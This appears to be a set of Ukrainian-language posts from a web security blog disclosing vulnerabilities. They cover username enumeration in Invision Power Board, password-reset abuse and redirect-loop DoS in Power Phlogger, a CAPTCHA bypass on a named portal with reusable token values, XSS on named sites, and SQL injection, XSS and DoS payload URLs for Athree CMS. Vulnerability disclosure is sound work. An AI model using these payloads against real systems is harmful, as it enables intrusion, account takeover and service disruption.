Websecurity - Веб безпека

У квітні, 29.04.2008, я знайшов Abuse of Functionality та Insufficient Anti-automation уразливості в форумному движку Invision Power Board.

Abuse of Functionality:

Мені вже давно (с 2005) була відома можливість визначення логінів на форумі - ім’я користувача на форумі є одночасно і його логіном. А того дня я виявив ще одну можливість, що базується на моєму методі виявлення логінів через Abuse of Functionality уразливості.

На сторінці реєстрації http://site/index.php?act=Reg&CODE=00 функція перевірки логіну (чи вільний даний логін), що спрацьовує при введені імені користувача, дозволяє дізнатися логіни користувачів в системі.

Якщо вказаний логін є на форумі, система відповість “found”:
http://site/index.php?act=xmlout&do=check-user-name&name=admin

Якщо вказаного логіну немає на форумі, система відповість “notfound”:
http://site/index.php?act=xmlout&do=check-user-name&name=admin_

Insufficient Anti-automation:

Враховучи, що дана функція немає захисту від автоматизованих атак, це дозволяє проводити автоматизоване виявлення логінів в системі. Що може бути зроблено за допомогою брутфорсерів логінів, зокрема, моєї програми Brute force login identifier.

В подальшому виявлені логіни можуть бути використані для визначення паролів користувачів системи.

Уразливі Invision Power Board 2.3.6 та попередні версії.

В даній добірці уразливості в веб додатках:

• New yarssr packages fix arbitrary shell command execution (деталі)
• joomla com_hello_world SQL Injection(id) (деталі)
• joomla com_product SQL Injection(catid) (деталі)
• BestWebApp Dating System SQL Injection (деталі)
• Firebird Remote Memory Corruption (деталі)
• New turba2 packages fix permission testing (деталі)
• Powered by Pagetool Ver (1.04-05-06-07) (деталі)
• Joomla Com_publication “pid” Remote SQL Injection (деталі)
• Packeteer Products File Listing XSS (деталі)
• Alkacon OpenCms tree_files.jsp resource XSS (деталі)

До раніше мною оприлюднених уразливостей в Power Phlogger, повідомляю про нові уразливості в даній системі для ведення статистики відвідувань. Деякий час тому, 16.02.2008 та 14.06.2008, я виявив Abuse of Functionality та Denial of Service уразливості в Power Phlogger. Про що найближчим часом повідомлю розробникам веб додатку.

Abuse of Functionality:

Уразливість в системі відновлення (створення нового) паролю (http://site/dspNewPw.php).

Знаючи “Ім’я користувача” та “e-mail” (id, який є логіном, можна взяти з js-коду лічильника) можна тимчасово заблокувати доступ до акаунта - бо сгенерується новий пароль, що замінить старий (тому користувачу потрібно буде вводити вже новий пароль). І у випадку, коли лист з новим паролем не дійде на емайл користувача (через спам фільтри, або якщо в користувача не був вказаний емайл в акаунті), то доступ до акаунту буде повністю заблокований.

DoS (Looped DoS):

Скрипти редиректять самі на себе (зациклений редирект, про який я вже писав). Mozilla автоматично зупиняє даний зациклений редирект (видає Redirect Loop Error), а IE - ні (продовжує звертатися до сервера). Якщо клієнт, що звертається до скрипта, сам не зупинить редирект, наприклад бот пошукових систем, то це спричинить велике навантаження на сервер.

http://site/edCss.php/
http://site/config.inc.php
http://site/cookie.php/
http://site/dlcount.php/
http://site/dspBrowserOs.php/
http://site/dspCalendar.php/
http://site/dspLogs.php/
http://site/dspNewPw.php/
http://site/dspOnline.php/
http://site/dspSignup.php/
http://site/dspStats.php/
http://site/dspTTF.php/
http://site/edit_user.php/
http://site/edSettings.php/
http://site/index.php/
http://site/load_css.php/
http://site/login.php/
http://site/main-dummy.php/
http://site/main.php/
http://site/mirolog.js.php/
http://site/pphlogger.php/
http://site/showhits.php/

Це $PHP_SELF DoS атака. Існує вектор XSS атак через $PHP_SELF, а це вектор DoS атак.

Уразлива версія Power Phlogger 2.2.5 та попередні версії.

Це десята частина уразливостей в Power Phlogger. Найближчим часом напишу про інші уразливості в даному веб додатку.

15.11.2008

У грудні, 19.12.2007, я знайшов Insufficient Anti-automation уразливість на сайті http://passport.a.ua. Уразливість в капчі порталу A.UA. Про що найближчим часом сповіщу адміністрацію сайта.

Останній раз стосовно проектів A.UA я писав про уразливість на shop.a.ua.

Детальна інформація про уразливість з’явиться пізніше.

14.03.2009

Insufficient Anti-automation:

Уразливість в капчі на сторінці реєстрації. Яка вразлива до MustLive CAPTCHA bypass method, що я описав в проекті Місяць багів в Капчах.

Для атаки потрібно посилати одні й ті самі значення параметрів code і security_refid (наприклад, code = JIK та security_refid = 0098f80e6eabe0b7c74427c4e9e6949b). Одна пара цих значень працює на протязі тривалого часу.

Дана уразливість досі не виправлена.

В даній добірці уразливості в веб додатках:

• F5 BIG-IP Web Management ASM Security Report XSS (деталі)
• IBM Quickr 8 Calendar Xss Injection (Bypass Quickr 8.0 Xss Filter) (деталі)
• phpechocms v 2.0 rc3 RFI (деталі)
• php-nuke Quran SQL Injection(surano) (деталі)
• aura cms lihatberita SQL Injection(id) (деталі)
• php nuke gallery SQL Injection(aid) (деталі)
• php-nuke Kuran SQL Injection(surano) (деталі)
• php-nuke Recipes SQL Injection(recipeid) (деталі)
• php nuke Sections SQL Injection(print) (деталі)
• Advisory: Tripwire Enterprise/Server XSS Vulnerability (деталі)

В лютому я писав про нову XSS уразливість в Drupal. І 21.02.2009 я зробив дослідження сайтів на движку Drupal, і виявив чимало сайтів на старих версіях Drupal, що мають цю дірку.

Зокрема я виявив наступні сайти з Cross-Site Scripting уразливістю: http://123teachme.com, http://pgdc.com і http://numbersusa.com (які використовують даний движок).

XSS:

http://123teachme.com

• alert(document.cookie)
• цікавий
• html включення

http://pgdc.com

• alert(document.cookie)
• цікавий
• html включення

http://numbersusa.com

• alert(document.cookie)
• цікавий
• html включення

01.07.2008

У листопаді, 02.11.2007, я знайшов SQL DB Structure Extraction, SQL Injection, Cross-Site Scripting та Denial of Service уразливості в системі Athree CMS (Athree CMS Lite). Як раз коли виявив уразливості на www.cctvua.com, де і використовується цей движок.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

12.03.2009

SQL DB Structure Extraction:

http://site/?p=1;c=1′;s=1

SQL Injection:

http://site/?p=1;c=1;s=1%20and%20version()%3E4

http://site/?p=1;c=1%20and%20version()%3E4;s=1

http://site/?p=-1%20union%20select%20version(),1,1/*;c=1;s=1

Дві blind SQL Injection та одна звичайна SQL ін’єкція.

XSS (через SQL Injection):

http://site/?p=-1%20union%20select%20'%3Cscript%3Ealert(document.cookie)%3C/script%3E',1,1/*;c=1;s=1

DoS (через SQL Injection):

http://site/?p=1;c=1;s=-1%20or%201=1/*

http://site/?p=1%20or%201=1/*;c=1;s=1

У квітні, 16.04.2008, я знайшов нову Cross-Site Scripting уразливість на сайті http://www.shram.kiev.ua (на якому є й розділ про хакерство і безпеку). Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливість на www.shram.kiev.ua.

XSS:

• alert(document.cookie)
• цікавий
• html включення

P.S.

На сайті є чимало інших уразливостей. До чого можуть призвести дірки на сайті (що мають місце на www.shram.kiev.ua тривалий час) я продемонстрував безпосередньо на даному сайті .

В даній добірці уразливості в веб додатках:

• Cisco Security Advisory: Default Passwords in the Application Velocity System (деталі)
• XOOPS Module myTopics-print SQL Injection(articleid) (деталі)
• joomla SQL Injection(com_geoboerse) (деталі)
• XOOPS Module wflinks SQL Injection(cid) (деталі)
• joomla SQL Injection(com_detail) (деталі)
• joomla SQL Injection(com_team) (деталі)
• joomla SQL Injection(com_formtool) (деталі)
• joomla SQL Injection(com_iigcatalog) (деталі)
• XOOPS Module section SQL Injection(articleid) (деталі)
• Multiple Security Vulnerabilities in Dokeos 1.8.4 (деталі)

Сьогодні була оприлюднена Cross-Site Scripting уразливість в WordPress MU. Уразливі WordPress MU 2.6.x та попередні версії (до версії 2.7).

Атака відбувається через HTTP заголовок HOST. Уразливість в profile.php де не фільтрується значення HTTP_HOST.

• Wordpress MU < 2.7 'HOST' HTTP Header XSS Vulnerability (деталі)